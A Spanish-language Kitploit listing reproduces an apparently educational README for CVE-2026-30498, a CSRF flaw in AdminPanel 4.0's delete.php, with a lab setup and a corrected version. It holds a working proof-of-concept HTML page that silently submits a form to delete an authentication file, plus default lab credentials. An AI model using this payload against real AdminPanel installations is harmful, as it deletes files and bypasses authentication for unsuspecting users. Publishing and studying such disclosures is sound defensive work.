Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-30498 — Demostración educativa de la vulnerabilidad CSRF con un entorno de laboratorio controlado, que incluye un exploit de prueba de concepto y una versión corregida con protecciones CSRF adecuadas. | Kitploit
Herramientas/GitHubGitHub/mehdi-ben-hamou/cve-2026-30498
Análisis de VulnerabilidadesExplotaciónSeguridad WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubmehdi-ben-hamou/cve-2026-30498

CVE-2026-30498

Demostración educativa de la vulnerabilidad CSRF con un entorno de laboratorio controlado, que incluye un exploit de prueba de concepto y una versión corregida con protecciones CSRF adecuadas.

Ver Repositorio
11hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-30498 – Vulnerabilidad CSRF (AdminPanel 4.0)


Resumen

ID CVE: CVE-2026-30498 (Reservado por MITRE)
Descubridor: Mehdi Ben Hamou

Existe una vulnerabilidad de Cross-Site Request Forgery (CSRF) en el endpoint delete.php de AdminPanel 4.0.

Esta vulnerabilidad permite a un atacante desencadenar acciones sensibles (eliminación de archivos) en nombre de un usuario autenticado sin su consentimiento.


Detalles Técnicos

La vulnerabilidad se debe a la ausencia de protecciones CSRF:

  • Sin validación de token CSRF
  • Sin validación de Origin / Referer
  • Acción sensible expuesta mediante solicitud GET
  • Sin verificación de la intención del usuario

El endpoint vulnerable procesa las solicitudes directamente basándose en la sesión del usuario sin validar el origen de la solicitud.


Impacto

Una explotación exitosa conduce a:

  • Eliminación de verifyPanel.php
  • Omisión de autenticación
  • La aplicación entra en modo de configuración
  • Posible reinicialización completa del sistema

  • Versión Afectada

    • AdminPanel 4.0 y anteriores (proyecto archivado)

    Escenario de Ataque

    Un atacante aloja una página web maliciosa que envía una solicitud falsificada:

    root@kitploit:~
    http://localhost:8080/delete.php?file=verifyPanel.php
    

    Cuando una víctima (usuario autenticado) visita esta página, el navegador incluye automáticamente las cookies de sesión y la solicitud se ejecuta.


    Prueba de Concepto (PoC)

    Página Maliciosa (Atacante)

    root@kitploit:~
    <form id="csrfForm" action="http://localhost:8080/delete.php" method="GET">
      <input type="hidden" name="file" value="verifyPanel.php">
    </form>
    <script>
      document.getElementById("csrfForm").submit();
    </script>
    

    Esta solicitud se envía automáticamente con la cookie de sesión de la víctima.


    Pasos para Reproducir

    1. Inicie el servidor de la víctima:
    root@kitploit:~
    php -S localhost:8080
    
    1. Acceda a la página de inicio de sesión:
    root@kitploit:~
    http://localhost:8080
    
    1. Inicie sesión con:
    root@kitploit:~
    admin / admin123
    
    1. Abra la página del atacante:
    root@kitploit:~
    http://localhost:8081/evil.html
    
    1. Lance el ataque CSRF
    2. Vuelva al panel de control:
    root@kitploit:~
    /panel/dashboard.php
    

    Qué Sucede Internamente

    1. La víctima inicia sesión → se crea la cookie de sesión
    2. La página del atacante envía una solicitud falsificada
    3. El navegador adjunta automáticamente la cookie
    4. El servidor ejecuta la eliminación sin verificación
    5. El sistema detecta la falta del archivo de autenticación
    6. La aplicación entra en modo de configuración

    Entorno de Laboratorio (Simulación Pedagógica)

    Este repositorio incluye un entorno de laboratorio controlado para reproducir la vulnerabilidad de forma segura.

    Importante: Este laboratorio es una simulación y no representa el código original exacto de AdminPanel.

    Restablecer Laboratorio

    Para restablecer el entorno:

    root@kitploit:~
    /reset.php
    

    Versión Corregida (Mitigación)

    Se implementa una versión segura en:

    root@kitploit:~
    delete_fixed.php
    

    Protecciones añadidas:

    • ✅ Validación de token CSRF
    • ✅ Solo método POST
    • ✅ Validación de Origin / Referer
    • ✅ Validación de sesión

    Por Qué Funciona la Corrección

    • El atacante no puede acceder al token CSRF (Política de Mismo Origen)
    • Las solicitudes falsificadas carecen de token válido → rechazadas
    • Las solicitudes de origen cruzado se bloquean mediante la verificación de Origin

    Estructura del Proyecto

    root@kitploit:~
    victim/
    ├── index.php
    ├── delete.php
    ├── delete_fixed.php
    ├── reset.php
    └── panel/
        └── dashboard.php
    
    attacker/
    └── evil.html
    

    Aviso Legal

    Este proyecto está destinado únicamente a fines educativos y de investigación.
    No utilice esta vulnerabilidad en sistemas sin la autorización adecuada.

    Descargar herramienta